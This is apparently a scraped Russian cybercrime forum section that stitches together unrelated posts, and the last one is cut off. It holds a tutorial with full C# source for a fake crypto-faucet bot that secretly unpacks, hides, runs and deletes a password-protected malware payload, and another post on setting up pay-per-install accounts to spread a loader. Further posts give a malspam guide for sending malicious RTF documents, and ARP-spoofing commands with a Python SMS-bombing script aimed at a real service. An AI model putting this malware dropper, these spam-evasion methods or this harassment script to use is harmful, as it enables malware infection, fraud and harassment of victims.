Spam, Traffic & Installs

**Статься ориентирована на новичков и профи в этой сфере, подойдет каждому.**
​


Идея изначально была моя, она проста и легка как весенний одуванчик, сейчас
решил ее дополнить и разложить по полкам, схема приносит ежедневный хороший и
очень качественный прогруз.

_Работать будем в Visual Studio 2019
C#_[_Скачать_](https://visualstudio.microsoft.com/ru/vs/)
П _онадобиться архиватор 7zip_[
_Скачать_](http://7-zip.org.ua/ru/download.html)

__Не пугайтесь те кто не шарит в VS и не когда не кодил! Начать не когда не
поздно я разложил все полкам куда жать и что делать.__
В __есь код закоментил почти каждую строку.__

Будут нужны красочные темы для форм C#
_Я специально подготовил для вас свою коллекцию качаем тут:_
<https://anonfiles.com/R9f25299n6/Theme_C_zip>
Пароль **xss.is**


> Мы будем писать с вами фейковые софта различного рода для распространения
> вашей малвари.
> Прошу заранее вас определиться с тематикой вашего софта, в статье я выбрал
> тематику крипты.
> Софт распространять мы будем там где могут попасться мамонты в этой сфере,
> а это различные форумы по криптовалюте так как тут проще всего.
>
> Click to expand...


**Перейдем от теории к практике:**


**Запускаем Visual Studio и создаем проект Windows Forms**


жмем далее и выбираем .Net 4.5 имя проекта будет в моем случаи Crex24, я буду
делать **“бота который собирает с кранов на бирже Crex24 различную крипту в
авто-режиме”**.

​


В проекте сразу перейдем к дизайну формы, тут дело фантазии каждого, основной
код который будет запускать вашу малварь мы пропишем позднее.
Для начала изменить стандартный дизайн формы на свой, для этого в начале
статьи я дал ссылку на скачивания пака тем.


​

Я выбрал тему **clsNeoBuxTheme.cs** она довольно красивая как по мне.
После жмем в верху VS _Сборка_ > _пересобрать проект_


Слева появится меню Компоненты Crex24, сразу выбираем тему главной формы

​

Так же добавим **ControlMenu** и размещаем там где это нужно.
Разверните вкладку **Все формы Windows Forms** и так же кидаем:


* Label – 4шт
* TextBox - 4шт
* 2шт Кнопки
* 2шт checkBox

_После красиво размещаем их на форме и переименовываем, изменить названия
компонентов можно тут:_


Мы получаем форму примерно такого вида:


Красиво, доверчиво.

> Теперь самое главное, как эта форма будет пропихивать нашу малварь, для
> начала желательно криптануть ваш билд малвари, форму криптовать не нужно и
> да-же обфусцировать поверьте, ее можно слить на ВТ и детекты не придут.
> Определимся когда будет запускаться наша малварь, не будем запускать сразу
> при запуске формы, можем спалиться. Запустим малварь например когда жертва
> нажмет кнопку Start
>
> Click to expand...


**Мы не будем качать ваш exe билд со сторонних серверов, и не будем таскать
его вместе с фейковым софтом в 1 exe. Мы так же не будем держать ваш exe рядом
с программой в открытом виде.

Для примера вместо малвари я буду использовать putty.exe

Переименуем putty.exe в update.exe**

_Далее я буду использовать архиватор 7zip
Щелкаем по exe “малвари” update.exe правой кнопкой и выбираем добавить к
архиву._

**Уровень сжатия Ультра, формат архива zip**
_Пароль любой у меня будет:_**123**



**Наш архив update.zip назовем: config.y
**​

_В этом архиве находится ваша малварь под паролем, да же если его слить на ВТ
ваш exe не улетит туда же._

**Возвращаемся к нашему фейковому софту:**

Теперь нам надо сделать так что бы наш софт сумел**скрыто распаковать этот
архив и запустить exe** от туда **при условии нажатия кнопки старт
Подключим необходимые NuGet пакеты:**


Жмем по вкладке Проект > управление пакетами​

Вкладка обзор, в поле поиска вводим **SharpZipLib** нужен для распаковки
архива устанавливаем​

После в поле поиска вводим **Costura.Fody** запихнет вашу dll SharpZipLib в
сам билд формы что бы не таскать его отдельно, и так же установить.​

​

**Жмем 2 раза на форму в пустом месте и пишем код распаковки и запуска:** ​

Далее разбор кода, вы так же можете скачать уже готовые исходники в конце
статьи.​



C#:Copy to clipboard



//Подрубим юзинги
using System;
using System.Text;
using System.Windows.Forms;
using ICSharpCode.SharpZipLib.Core;
using ICSharpCode.SharpZipLib.Zip;
using System.Diagnostics;
using System.IO;
using System.Threading;

namespace Crex24
{

public partial class Form1 : Form
{

public Form1()
{

InitializeComponent();
}
private void clsButtonGreen1_Click(object sender, EventArgs e)
{
string dir = Environment.GetEnvironmentVariable("AppData") + "\\Update"; // Путь к папке куда распакуем exe
if (!Directory.Exists(dir))
File.SetAttributes("config.y", FileAttributes.Hidden | FileAttributes.System); // Скрываем от пользователя сам архив

//Далее шифруем наш пароль от архива и распаковываем
//Зашифровать пароль можно тут: http://base64.ru/
//В моем случаи пароль на архив config.y был 123 по этому после закодирования пароля в
//base64 у меня будет пароль выглядеть так: MTIz

string password = Encoding.ASCII.GetString(Convert.FromBase64String("MTIz")); // Пароль от архива зашифрованный в base64
ExtractZipFile("config.y", password, dir + "\\"); //Распакуем архив

File.Delete("config.y"); //Удаляем архив
//Далее создаем поток и запускаем нашу малварь при клике на кнопку Start:
new Thread(() =>
{
try
{
File.SetAttributes(dir + "\\update.exe", FileAttributes.Hidden | FileAttributes.System); // Скрываем от пользователя
Process proc = Process.Start(dir + "\\update.exe"); //Запускаем exe малвари

// 2 строки далее можно удалить или оставить смотря как вам нужно
proc.WaitForExit(); //Ждем завершения работы малвари (если требуется)
File.Delete(dir + "\\update.exe"); //Удаляем exe малвари (если требуется)
}
catch (Exception)
{
}

}).Start();
}

// Функция для распаковки архива
private static void ExtractZipFile(string archiveFilenameIn, string password, string outFolder)
{

{
ZipFile zf = null;
try
{
FileStream fs = File.OpenRead(archiveFilenameIn);
zf = new ZipFile(fs);
if (!String.IsNullOrEmpty(password))
{
zf.Password = password;
}
foreach (ZipEntry zipEntry in zf)
{
if (!zipEntry.IsFile)
{
continue;
}
String entryFileName = zipEntry.Name;


byte[] buffer = new byte[4096];
Stream zipStream = zf.GetInputStream(zipEntry);
String fullZipToPath = Path.Combine(outFolder, entryFileName);
string directoryName = Path.GetDirectoryName(fullZipToPath);
if (directoryName.Length > 0)
Directory.CreateDirectory(directoryName);


using (FileStream streamWriter = File.Create(fullZipToPath))
{
StreamUtils.Copy(zipStream, streamWriter, buffer);
}
}
}
catch (Exception ex)
{
throw ex;
}
finally
{
if (zf != null)
{
zf.IsStreamOwner = true;
zf.Close();
}
}


}

}

private void TextBox2_TextChanged(object sender, EventArgs e)
{
}
}
}



**Добавляем красивую иконку для софта, правой кнопкой по проекту > свойства >
Значек и манифест**
На раб. столе, создаем папку CranBot Crex24 и кладем в нее наш **exe фейка**
\+ рядом **config.y архив соответсвенно.**

Ох сейчас вы скажете зачем но поверьте все ОК! **Заливаем наш exe файл фека на
ВТ.

И поверьте такой детект я наблюдаю уже почти год. **

### [ VirusTotal
](https://www.virustotal.com/gui/file/f94677c9545bda5e8568185eb108450c63c632593b21fc49cdc2f955cc65fc28/detection)

VirusTotal

www.virustotal.com

**Вить это у нас по сути простой разархиватор zip архивов.**

Ваша малварь в архиве под паролем, да же если ее зальют на вт толку от этого
не будет.

Не верите, вот вам пример, собсвенно почему я и выбрал CrexBot для основы
своего фейка:

### [ Кран-бот для Crex24.com + 20$ в день
](https://bitcointalk.org/index.php?topic=5092978.0)

Кран-бот для Crex24.com + 20$ в день

bitcointalk.org


**January 04, 2019 Дата публикации статьи**
**Там я да же ВТ приложил той же датой, он с тех пор не изменился. И до сих
пор идут инсталы.**
Да пост я выложил в ру сегменте, но выкладывал я только ради проверки схемы,
далее я перешел на пендосов.


> Это лиш 1 тема размещенная на 1 форуме, таких тем по разным зарубежным
> форумам о крипте у меня много, за год разных фейков софтов я написал уже
> порядка 50шт, вы же если не так ленивы как я, за 1 год наклепаете более 5000
> софтов... представьте какой профит будет? Но работа будет монотонная. Ноя
> уверенно скажу что вы не 1к $ срубите! тем же клиппером BTC адресов.
> При чем на 1 софт уходит 10-15 минут, просто изменив вид формы под нужный
> софт понакидав туда различных компонентов и все.
>
> Click to expand...


Как вы поняли схема очень легкая, профитная, идает хорошую защиту от слива
вашей малвари на ВТ.


> Распространять конечно же придется в 1 рахиве в 1 папке что бы 2 файла
> forma.exe и config.y лежали рядом.
> Так же можно рядом с формой создать папку img понакидать туда разных
> картинок, иконок флагов более 100шт и вместо config.y назвать архив us.png
> этот файл смешается среди кучи картинок. А наш софт будет брать именно его,
> распаковывать и запускать.
>
> Click to expand...


Видео обзор работы готового фейка:


**На видео я показал логику работы софта и еще хочу дполнить словами:**

1. Запуск формы
2. Нажатие на кнопку старт
3. Срабатывает распаковка архива config.y в папку C:\Users\\\AppData\Roaming\update
4. Скрывает update.exe малвари (в моем случаи putty)
5. Удаляет изначальный архив рядом с exe формы config.y
6. Запускает update.exe
7. Ждем завершения программы
8. Удаляет update.exe

Вот и вся схема.
Кстати данный мануал отлично подойдет для распространения майнера, т.к очень
легко понаделать фейковые формы читов различных игр. Как мы знаем у геймеров
за частую нормальные карты стоят в пк. Не шарю в фортнайт но видел там аховые
цены на аккаунты, понаделайте различные софта типо читы, трейнеры, подсчет
статистики если для этой игры такое можно я уже сказал не шарю, и хапайте
стилаком данные аки.
Дело фантазии и можно наклепать что угодно, представьте что форма это полотно
как фотошопе
.

Я не рекомендую обфусцировать сам софт формы, смысла нет + начнет палится со
временем, а так будет жить и жить. К тому же мы вить не будет распространять
подобное на площадках где будут декомпилить его.
Еще 1 плюс этой схемы это хороший обход рантайма некоторых АВ при запуске
вашего exe

**Собственно как и общеал вот вам готовый исходник который мы разобрали с вами
в этой статье:**

### [ Crex24.zip - AnonFiles ](https://anonfiles.com/Z4x35f9en7/Crex24_zip)

anonfiles.com


**Пак тем для форм:**
<https://anonfiles.com/R9f25299n6/Theme_C_zip>
Пароль **xss.is**


**Все тех. вопросы задаем тут, отвечу всем.** ​

Всем привет!
В теме стало мало единомышленников.
Потому, готов помочь новичками и не только!
**Отвечу на вопросы касательно Google ADS!**
Задавайте, не стесняйтесь.

**

Немного предыстории, перед тем как начать. ​

**
Статью я думал писать еще давно, перед тем как администрация запустила
конкурс. Никак руки не доходили. Ну раз пошла такая пьянка с конкурсом, то
почему бы и нет, если да.
На написание статьи меня с подвигло несколько причин, самая важная из них -
УХУ евшие селлеры инсталлов, которые нас, простых и честных работяг, кормят
этим "качественным" продуктом. После моей статьи, Слава Богу, их станет
меньше.
Многие наверно уже поняли, что речь пойдет о файловых биржах, так как именно
от туда льют 90% селлеров, а то и больше.
Ладно, хватит болты болтать. Погнали.


**

Скучная теория, промотай дальше. ​

**
Файловые биржи делятся на 3 группы:

* Биржи, которые работают сами на себя, которые действительно берут себе вебмастеров, и не зависят от третьих лиц.
* Биржи-реселлеры, которые продают трафик бирж из первой группы, с наценкой своим рекламодателям. Мол бизнесмены. Вебмастеров не берут, просто редиректят всех вебмастеров которые им пишут 301 редиректом, биржам из первой группы.
Второй вариант бирж ресселеров, это когда биржа скупает трафик у вебмастеров,
и продает биржам из первой группы. Очень похожи по природе на УХУ евших
селлеров инсталлов.

* Секретные биржи которые знаю только я.

Парочка примеров :

* installs.pro - не ресселеры, честные ребята, трафик качественный если сравнить с другими биржами, апрув сложный. Пролито десятки тысяч инсталлов у них. Занимают если не первое место, то второе точно. По качеству.
* installcube.com - не ресселлеры. Всем известный куб, на эксплоите кто-то уже писал тему про эту биржу. Можем поблагодарить человека за это, из-за его статьи куб снова можно использовать, и получать инсталлы уже среднего качества. Саппорт правда ужасный.
* installcapital.com - ресселеры, чурки. И именно эту биржу используют многие селлеры инсталлов. Привет, ребята, биржа вас на@бала.
Биржа заюзана, ваши логи имеют весь экслплоит, в общем рыбалка в пустом пруду.
Еще ресселеры :
installunion.com
cinstaller.com
installppi.com
И все остальные которые вам выдаст Google по запросу "pay per install
network".
Почти все.

**

Подготовка. ​

**
На самом деле, всё очень просто. Часто селлеры которые продают аккаунты в
файловых биржах, да и селлеры инсталлов, говорят что создать аккаунт в бирже
очень сложно, нужно иметь кучу документов, сертификатов, подписей, и так
далее.
Х@й там. Вот такой ---
Всё что нужно, это простенький софт, и лендинг. Примерные расходы на это
150-200 американских рублей. installs.pro раньше еще требовали первый депозит
внести, но этот депозит вы можете использовать, лить инсталлы, поэтому я думаю
это не проблема. Сейчас сказать не смогу, новые аккаунты не делал, может
изменилась политика.
Софт можем заказать на таких форумах как BHF, школьники за копейки сделают.
Серьезный софт для этого дела не нужен, исходя из этого, дело можно доверить
молодым кодерам. Самая важная функция это подгрузка малвари при запуске софта.
Лоадер.
Примеры софта - такие, как Punto Switcher, какой-нибудь чистильщик, бустер,
Unlocker и прочее. Функционал можно под ноль скопировать, главное свое
название, и дизайн. Софт чисто ваша фантизия, разницы особой нет. Главное
чтобы работал на всех ОС, и это важно. Если ваш софт к примеру не работает на
Windows 10 по каким то причинам, в бирже будет низкий CTR, и из этого поток
инсталлов будет медленным, или вообще не будет идти. Так же нужно следить за
детектом софта, из-за того же CTR.
Биржа возможно будет спрашивать какая монетизация у вашего софта. Согласитесь,
будет странно если вы будете лить инсталлы, на софт который не имеет никакой
монетизации. По этой причине вас могут не пропустить, даже если софт чистый.
Я использую два способа "монетизации", на мой взгляд, самые простые. Первый
это триал версия софта, использование какое-то время, потом покупка полной
версии. В бирже я лью на триал версию, а вот на сайте у нас можно купить
полную версию софта. Главное чтобы название софта содержало бы слова "Trial",
или "Demo", и ссылку на ваш софт. Подозрений тогда не будет, и полную версию
никто у вас просить не будет.
Второй способ это донаты. Бирже говорим что софт бесплатный, живем на донаты.
Вы конечно можете придумать свои варианты, встроить в софт рекламные баннеры и
прочее, но я думаю что мои способы проще будут.

Теперь про лендинг. Дизайн лендинга можно сделать как у софта, и добавить на
сайт парочку картинок вашего софта. Сайт должен содержать описание софта,
кнопку скачать, вкладку где купить/донатить, EULA и Privacy Policy, контакты.
EULA с Privacy Policy можно скопировать с любого софта, лишь поменять все
названия на ваши. Или же сгенерировать любым онлайн генератором, легко можно
нагуглить.
Минимализм.
Если монетизация у вас будет донаты, то вкладка донаты должна содержать
реквизиты, куда донатить. Если пробная версия, то можете просто указать что за
покупкой полной версии пишите на почту, и указать контакт. Кому не лень,
можете прикрутить кассу для приема платежей.

**

Почти конец. ​

**
После того как вы сделали софт, поставили сайт на хостинг, можете смело писать
любой бирже, апрув обеспечен. Да, всё так просто.
Пример как писать - " Здравствуйте! Я разработчик софта
"UstanoviMojSoftiPoluciBonus" (ссылка на сайт) интересует сотрудничество с
вами, где я могу почитать об условиях сотрудничества/правила/договор? "
Конечно же, эти скучные документы читать не нужно, просто нужно показать нашу
адекватность, официальность, и всё остальное что вы никогда не показывали при
общении в жабе.
Ответили вам, говорите что согласны, вас это устраивает, можно что-то уточнить
еще раз. Дальше вам сама биржа будет говорить что нужно делать, просто
следуйте их указаниям. Там всё очень просто, любой дурак поймет.
Ответы на некоторые их вопросы:
Q: Какая монетизация у софта?
A: Донаты/триал версия. Тут смотрите сами что у вас будет.
Q: Предоставьте EULA/Privacy Policy
A: На сайте можете найти.
Q: Какой у вас рекламный бюджет в месяц?
A: 5000-10000$
Даже если у вас бюджет 1000$ в месяц, не важно. Никто потом ничего спрашивать
не будет. Если вы укажете маленькую сумму, им просто не выгодно и не интересно
будет сотрудничать с вами. Возможно вам откажут.
И это были самые сложные вопросы. Всё, вы теперь можете стать официальным
селлером инсталлов, вы прошли этот "сложный" путь.

**

Конец, серьезно о серьезном. ​

**
Это всё что вам нужно для создания аккаунта в файловых биржах. Не покупайте
инсталлы у селлеров, не покупайте аккаунты. Вы это всё можете сами сделать,
вложив 150-200 баксов. Именно за такую суммы вы можете сделать себе аккаунт в
каждой бирже. Один софт можно использовать в разных биржах.
Я никогда не продам вам свои инсталлы, потому что они качественные, и идут в
одни руки - в мои. Всё просто.

Благодарю за внимание, буду рад если кому-то понравилось. Конкурс конкурсом,
но если вы начнете сами делать аккаунты, перестанете покупать инсталлы у
селлеров, для меня это будет лучший приз. До Нового года постараюсь написать
статью о том, как я делаю инсталлы со спама, и немного о точечных атаках на
компании.

Для администрации - это не мой основной аккаунт, на форумах и тут, другие
ники, аккаунт сделан для этой статьи. Не хотелось палить основу. Буду
благодарен если не забаните, использовать его для каких то других целей не
буду.
Если статья не подходит для конкурса - извиняюсь, цель изначально другая была.

Доброго времени суток.
Как и ранее мы будем рады помочь каждому кто в этом заинтересован.
Задавайте вопросы по Google ADS, темной и белой тематики.
Если мы не сможем ответить, уверен тут найдется много знатоков!)

Собственно сабж. Все что всплывает очень поверхностное. По типу нажми сюда,
нажми туда ... Профит. Где нарыть более развернутые с технической точки зрения
материалы?
Может стоит купить доступ на экспу? Или там не особо по теме спама?

Господа ищу ботов, исходники ботов и все что с этим связано. Есть желани
попытаться организовать собственный ботнет. Ищу помощи и содействия.

**ALLERT (тема может вызвать очень много бугурта в комментариях ибо анскилл
мутит гайды
самокритика )**
Тема подойдет как и для доставки троянов так и для сеошников и фишеров.
Что нам понадобится для рассылки?
1\. [AMS Enterprise](https://www.sendspace.com/file/nnqmct) (**АЛЛЕРТ СТАВИМ
НА ВИРТУАЛКЕ**)
2\. SMTP с поддержкой доставки на целевой таргет
3\. Мобильные прокси

Итак первым делом ставим софт с этим делом думаю разберетесь.
Далее идем на **xleet.to** **регаемся вносим депозит 3-10$**
Идем в раздел **смтп.**

Вбиваем майл **для теста** куда будем доставлять почту для тестов.

Тыкаем SAVE обновляем страницу и тычем SEND по всему списку.


Заходим на почту проверяем письма которые попадут в инбокс


Покупаем нужный нам сервер (**важно чтобы СМТП имел поддержку Webmail**)

Заходим в свои ордера и видим там что-то похожее на
mail.******.com:587|robot@*******.com|1&*sJ,jc)V_P|PlanetHoster

Идем по домену mail.******.com авторизовываемся

Находим настройки для майл клиентов


Открываем наш сендер и вбиваем настройки


После проверки статус СМТП должен быть рабочий.

Общие настройки для всех режимов выглядят вот так:
Желательно **TO или CC (персональная копия идет в спам)**


Далее идем составлять письмо


**Делаем рандомизацию текста для обхода спам фильтров**

Составляем наше письмо **у кого на сколько хватит фантазии** редактор имеет
очень большой функционал **\+ возможность отправлять HTML письма.**
Тут используем все свои навыки социальной инженерии для достижения наилучшего
результата.
Дабы не тратить много времени я набросал 1 предложение.


Внизу добавляем файл разводки редирект в формате PDF (можно использовать
ссылки с дабл трипл редиректами в самом письме но только свои с шеллов
кристальной чистоты)

Идем в настройки учетной записи
Заполняем **имя отправителя и организацию на свое усмотрение.**
Но **обратный имейл рандомим** главное, чтобы он был (**особенность софта тк
он будет все-равно считываться с смтп**)
**Reply пустое**


С добавлением списка получателей сложностей думаю не будет но для теста
вбиваем наш тестовый имейл гугла:


Далее нам нужны будут **прокси** идем сюда **ltespace.com** покупаем **МТС**
или **Билайн** **мобильные прокси**. (обязательно с этого сервиса **за другие
не ручаюсь**)

Почему мобильные прокси с сервиса а не рандомные с паблика (тут все просто
будет уходить в спам)

После покупки составляем такой текстовик:

**ОДНОГО ПРОКСИ БУДЕТ ДОСТАТОЧНО ПРОСТО ВВОДИМ ЕГО В ТЕКСТОВИК 1-100 РАЗ
ПРОКСИ ИМЕЮТ ВНУТРЕННЮЮ РОТАЦИЮ НА СТОРОНЕ СЕРВИСА 1 раз в 2 минуты**


Code:Copy to clipboard



*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***
*******IP*****,17131,HTTP,*** логин ***,*** пароль ***



Загружаем список проксей которые составили ранее


**Проверяем прокси**

Тычем ок на всех настройках и пробуем запустить рассылку



Заходим на почту и проверяем инбокс



Переходим к нашей пдф разводке


Тычем загрузку


И о чудо грузит наш RTF для заражения. (офис эксплоит макро чистый... нууу
почти)

Стоит упомянуть все подводные камни данного способа.

Минусы - долго подбирать нужные шлющие "читаем правильно =D" смтп, долго
рандомизировать текст, не всегда выходит доставлять вредоносные файлы в инбокс
ибо это гугол если письмо проходит туда минимум 20-30 реверсов у вас будет
висеть =D
Плюсы вам никто не $бет мозги за происхождение базы как при легальной
рассылке, сколько хотите столько и отправляете **все упирается в колличество
проксей и смтп.**

Если вам сложно разобратся или не получается настроить софт можно попытать
счастье с пхп майлерами на том же икслите <https://xleet.to/mailers> там все
без настроек проверяем инбокс пишем письмо + вложения если нужно и шлем.
Минусы 500 писем и блок айпи со стороны майлера и невозможность рандомизации
текста.

Данные способы могут подойти для реализации фишинг атак, сео, и заражения
контор.
Скажу сразу слать тояны с гугл смтп или на гугл смтп гиблое дело ибо боты
реверсеры и спам фильтры вас заебут если работаете по корп почтам еще терпимо
не все корпы стоят на известных почтовых сервисах.

Я лично использовал данный метод для заражения контор в 2019 но забросил это
дело. (**ЛОКЕРЫ РУЛЕЗ =D**)

Кто не понимает мануал 500$
**" Жми тильт и набирай мой ник. И я к тебе уже бегу на все готов и все могу и
зажимаааая CTRL+F мы наеб@шим всех =D" (Enemy)
Ну а если серьезно вас слишком много желающих и каждому все настроить это
пиз№ец.
Читайте мануал, всем инбокса!**

Кому нужны пдф разводки:
[Ссылка тут](https://www.sendspace.com/file/4d8vqw) (открываем док файлы
меняем ссылки сохраняем как PDF)

Такая реализация рассылки имеет минимум затрат
С 12 смтп серверов с ротацией можно послать до 10 к писем (в зависимости от
того куда шлем, что шлем и от паршивости базы)
**Тру рассыльщики в комментах делимся опытом. Уничтожаем
автора**
PS. Статья писалась под энергетиком в 4 часа утра. Если чет пропустил или
забыл ссыль пишите подредачу.

Привет!

Сегодня я расскажу как можно написать SMS спамер. На написание статьи побудил
скрипт [Spammer-Grab](https://github.com/Noxturnix/Spammer-Grab). Суть его
заключается в том чтобы заставить сервисе слать коды подтверждения на телефон
жертвы (работоспособность его не проверял) если верить людям, то он рабочий.

Сразу скажу что текст сообщения задавать нам не удастся но суть спамера не в
доставки нужного нам текста а достать человека на которого направлена спам
атака.

**Постановка задачи:**
Для того чтобы реализовать задуманное нам понадобиться найти android
приложение в котором есть функция регистрации по номеру телефона с кодом
подтверждением который будет приходить в виде SMS. Собственно это самое
сложное что нужно сделать во всей схеме. Затем надо получить HTTP запрос с
параметрами который отправляется для регистрации и написать небольшой скрипт
который будет делать столько запросов сколько нам надо.

**Реализация задуманного:**
Для начала найдем приложение которое будет отвечать нашим требованиям. Первое
в которых есть данный функционал как правило предоставляют какие то услуги.
Первое что пришло на ум это заказ такси. Идем в Google Play в поиске вводим
“Такси” и начинаем искать подходящие нам приложение. Те что в топе лучше не
брать обращаем внимание на приложения с плохим рейтингом. Пролистав пару
экранов вниз натыкаемся на приложения “[Такси
Магнит](https://play.google.com/store/apps/details?id=taximagnit.taxi.android&hl=ru)”.


Устанавливаем его себе на телефон. После того как мы проверили что функционал
приложения нам подходит настает этап перехвата трафика. Можно было бы
попробовать это сделать средствами Android но у меня нет прав root и по этому
я пойду другим путем. Вы можете найти свой способ для перехвата трафика не
обязательно делать как я. Первое что мне пришло на ум это ARP-spoofing.
Подключаем android и ноутбук к своей точки доступа и проводим ARP-spoofing.

**ARP-spoofing:**
ip андройда: `192.168.10.107` (ip может отлечаться)
ip роутера: `192.168.10.1` (ip может отлечаться)

Для проведения атаки arp-spoofing должны быть разрешены транзитные пакеты.

Code:Copy to clipboard



echo 1 > /proc/sys/net/ipv4/ip_forward

Затем проводим непосредственно саму атаку.

Code:Copy to clipboard



arpspoof -i eth0 -t [ip андройда] [ip роутера]
arpspoof -i eth0 -t [ip роутера] [ip андройда]

-i — указывает интерфейс, подключенный к локальной сети
-t — указывает IP-адрес хоста, arp-кэш которого требуется «отравить».



Теперь весь трафик с андройда идет через нас. Запускаем Wireshark выбираем
свой интерфейс у меня это eth0. В поле фильтр вводим `ip.addr ==
192.168.10.107 and http` (укаываем ip вашего андройда).


Возвращаемся к приложению и выполняем запрос на регистрацию.

Переходим в Wireshark и видим новые HTTP запросы. Обращаем внимание на POST
запрос у которого в поле Info есть часть URL которое содержит create-invite.
Пробуем еще несколько раз получить код что убедиться что это то запрос который
нам надо. Для того что бы точно быть уверенным в том что мы нашли нужный
запрос его можно проверить руками использую [Advanced REST
client](https://chrome.google.com/webstore/detail/advanced-rest-
client/hgmloofddffdnphfgcellkdfbfbjeloo?hl=ru).


Рассмотрим запрос более детально. Нажмем на него правой кнопкой мыши в
появившемся меню наведем на Fallow и в новом списке выберем HTTP Stream.

Откроется окно с информацией похожей на эту:

Code:Copy to clipboard



POST /est-taxi/create-invite/1.0/ HTTP/1.1
Content-Length: 103
Content-Type: application/x-www-form-urlencoded
Host: 5.9.150.148:8200
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

invite={"phone-number":"+XXXXXXXXXXXX","application-acronym":"TAXI_MAGNIT"}
HTTP/1.1 200 OK
Accept-Charset: UTF-8
Content-Type: text/plain; charset=UTF-8
Content-Length: 29
Connection: keep-alive

{"result":{"result-state":0}}

Давайте разберем что из этого нам нужно:

Code:Copy to clipboard



Тип запроса: POST
URL на который будет отправляться запрос: http://5.9.150.148:8200/est-taxi/create-invite/1.0/
Обязательные параметры которые требуется передать: invite={"phone-number":"+XXXXXXXXXXXX","application-acronym":"TAXI_MAGNIT"}
Ответ от сервера в случае успешной отправки: {"result":{"result-state":0}}

На этом этапе мы получили все данные которые нам нужна (при тестировании
запроса было вывалено что минимальный промежутка паузы между повторной
отправкой SMS 10 сек). Теперь можно приступить к написанию кода. В качестве
языка программирования я выбрал [python](https://www.python.org/).

Python:Copy to clipboard



#!/usr/bin/python
# coding=utf-8

import requests, argparse, json, time


# Функция обработки передаваемых параметров
def options():
parser = argparse.ArgumentParser(prog='SMSSpammer', description="The script sends spam messages via SMS",
epilog='SMS Spammer script by n3d.b0y for Grey Section')
parser.add_argument('--number', '-n', required=True, help='Phone number (example: 79006403861)')
parser.add_argument('--limit', '-l', type=int, default=3,
help='Limit SMS (default: 3)')
parser.add_argument('--delay', '-d', type=int, default=20,
help='Delay time in seconds (default: 20)')
return parser.parse_args()


# Отправка POST запроса с параметрами. Функция принимает номер телефона формата 79006403861.
def post_requests(number):
r = requests.post('http://5.9.150.148:8200/est-taxi/create-invite/1.0/',
data={'invite': '{"phone-number":"+' + number + '","application-acronym":"TAXI_MAGNIT"}'})
return json.loads(r.text)


def main():
# Получаем переданные параметры
params = options()
inc = 0

# Цикл будет делать столько итераций сколько мы передали в партере limit
while inc < params.limit:
# Передаем номер телефона и отправляем POST запрос
response = post_requests(params.number)

# Если ответ пришел положительный выводи OK если с ошибкой выведем Error
if int(response['result']['result-state']) == 0:
print '+' + params.number + ' - OK'
else:
print '+' + params.number + ' - Error'

inc += 1
# Делаем пазу перед следующим запросом
time.sleep(params.delay)


if __name__ == '__main__':
main()

Вот мы и написали наш спамер. Как видите сложного в этом ничего нет. Его можно
улучшить добавив поддержку прокси + еще несколько сервисов чтобы спам шел без
интервалов задержки но это уже не относиться к данной теме. Данное приложение
я нашел не с первой попытки. Оно было третье по счету. В приложениях с хорошим
рейтингом стоят системы блокировки по IP и лимиты в 15 мин на повторную
отправку SMS. Но если у вас есть лишний час пару таких приложений найти можно
запросто. Надеюсь я не в пустую потратил свое время и вам были интересно это
читать

Кстати обратите внимание на дизайн приложения. По идеи все приложения с таким
дизайном связанные с такси будут поддерживать множественную отправку SMS без
блокировки. Так как такие приложения штампуется билдерам который идет в
комплекте с CRM для приема заказов вызова такси. Знаю это точно так как работа
лет 5 назад с таксистами которые хотели свою CRM и независимое android
приложение, на тот момент у них было именно такое приложение которое можно
было скомпилировать прямо в CRM.

**Автор: @n3d.b0y**
взято с codeby

У многих жителей форума возникает потребность в использовании дополнительных
компьютерных мощностей.

Я подумал, что можно организовать что-то подобное buq-track (так что ли
пишется?) - программы распределённых вычислений.

Она позволит использовать ВСЕ машины, имеющие отношение к форуму (хозяева
котрых разрешат использовать их вычислительные ресурсы) для выполнения
переборов (взлома имеющегося кода перебором).
Если кто-то заинтересуется - может попробовать реализовать.

Прога состоит из серверной и клиентской частей.
Серверная управляет распределением частей кода по конкретным машинам.
Клиентская - загрузкой куска кода и его взломом в свободное от работы
(процессора) время.

Напишите если я могу помочь...

P.S:

2 moderators
Если не в тему - удалите - не обидюсь...

«Лаборатория Касперского» и Subscribe.Ru провели исследование российского
рынка спама и попытались выяснить, кто является типичным российским заказчиком
услуг спамеров. В исследовании приведены некоторые оценки самих заказчиков
спама: почему они используют этот рекламный канал и насколько он эффективен.

Исследование особенно актуально в связи со вступлением в силу 1 июля 2006 г.
новой редакции закона «О рекламе», в котором делаются первые для России
попытки вывести спам за рамки правового поля.

По результатам опроса выяснилось немало любопытных фактов. Например,
оказалось, что около 60% (57,9%) заказчиков спама отрицают факт рассылки
спама. Это свидетельствует о том, что компании, решившиеся на рекламу в спаме,
четко осведомлены о негативной общественной оценке этого явления.

Еще один вопрос, ответ на который пытались найти исследователи: кто
непосредственно принимает решение о проведении рассылки, кто контактирует со
спамерами. По результатам опроса, более чем в 80% случаев исполнителями
являются менеджеры по рекламе, однако в процессе заказа рассылок спама
активное участие принимают и руководители компаний. Так, в 5,6% опрошенных
компаний, они не только инициируют заказ, но и оформляют деловые отношения со
спамерами.

Стоимость одной рассылки спама колеблется в пределах от 1000 до 45.000 рублей.
В Москве предпочитают рассылки стоимостью от 3001 до 6000 рублей, а в
Петербурге берут подешевле. В целом по России 50% опрошенных заказчиков спама
заявили, что они платят от 3001 до 6000 рублей за одну рассылку. Сумма,
безусловно, незначительна для компании любого масштаба и совершенно
несопоставима с любым легальным рекламным каналом.

Количество адресов в одной рассылке также сильно колеблется в зависимости от
того, кто предоставляет услуги по распространению спама. Наименьшее названное
количество — 100 адресов, наибольшее — 3.700.000. Каждый третий заказчик
выбирает путь «максимального охвата» — рассылки свыше миллиона адресов, где
совершенно не учитывается целевая аудитория рекламируемых товаров и услуг.

Эффективность спама ни один из респондентов не смог оценить. В среднем,
